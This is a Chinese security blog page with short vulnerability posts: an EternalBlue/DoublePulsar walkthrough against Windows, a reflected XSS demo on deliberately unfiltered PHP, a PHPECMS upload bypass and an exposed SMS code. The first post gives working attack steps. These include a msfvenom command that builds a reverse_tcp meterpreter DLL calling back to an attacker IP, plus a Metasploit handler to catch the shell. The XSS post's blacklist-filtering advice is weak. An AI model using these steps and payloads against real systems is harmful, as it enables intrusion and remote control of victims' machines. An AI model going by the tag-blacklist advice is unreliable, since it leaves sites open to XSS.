分类 漏洞发布 下的文章

windows溢出0day利用方法

拿到exp,测了下
所需环境如下:一,攻击机1(32位系统,py2.6版本,pywin32) 二,攻击机2(linux带msf就好)
windows目录下新建listeningposts目录,空的就好(是exp下的windows目录,不是C盘下的windows目录)
不需要注释文件
执行python fb.py
可看到如下页面
1.png
设置攻击IP,如192.168.1.24
设置监听IP,
切记,这里是no,红框位置
2.png
接着use eternalblue,一直回车即可,一直到这里,红框位置,根据自己的环境选择,我这边两个都选的1
3.png
接着回车,可以看到如下页面
4.png
use Doublepulsar,回车注意红框位置,第二个红框,这里选择2,接着输入恶意dll的路径,
5.png
恶意dll的生成命令如下,在linux中生成,linux需要装好msf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > test.dll
IP,端口,输出的名字自己改并把dll文件移植到攻击机1中(顺序有点放反了,不过没事)
如图所示
6.png
接着,攻击机1就暂时别动了,去攻击机2,打开msf,命令如下: msfconsole use exploit/multi/handler set LHOST set LPORT exploit, 设置好IP,端口接着开始监听,继续回到攻击机1,回车就好了,可以看到如下页面,就是攻击成功了,返回攻击机2,可以看到已经反弹了shell
7.png
8.png

简单的反射型XSS漏洞挖掘与防御

<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '< pre>';
echo 'Hello ' . $_GET['name'];
echo '</ pre>';

}

?>
我们看这段代码,没有经过任何过滤,本地测试,成功弹框4444.png

<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '< pre>';
echo 'Hello ' . str_replace('< script>', '', $_GET['name']);
echo '</ pre>';

}

?>
下面,来看这段代码,过滤了script,但xss不仅仅是过滤script那么简单的事,本地测试下555.png果然是不可以的,不用script,用img标签,成功弹框。防御的话,过滤script,alert,javascript,<,>,/,img等标签即可66666.png

PHPECMS前台getshell

网上看到phpecms这套系统,本地搭建环境,进行测试
任意注册一个用户,看到存在一个上传点,上传测试
1.png
直接上传php文件,上传错误2.png
Content-Type:改成jpeg/gif格式
成功上传,拿到shell3.png

关于任意手机注册漏洞

今晚偶遇一站,感觉有任意注册漏洞
自己手机号先注册,一看,4位验证码,丢burp爆破,怎么也没爆破的出来。
手机还滴滴滴叫个不停,99+的验证码,我靠。还有个短信轰炸漏洞啊
burp抓包模拟提交,惊呆了,验证码就在返回的值里面。
建议验证码至少6位以上,复杂点,不要纯数字。2096828955.png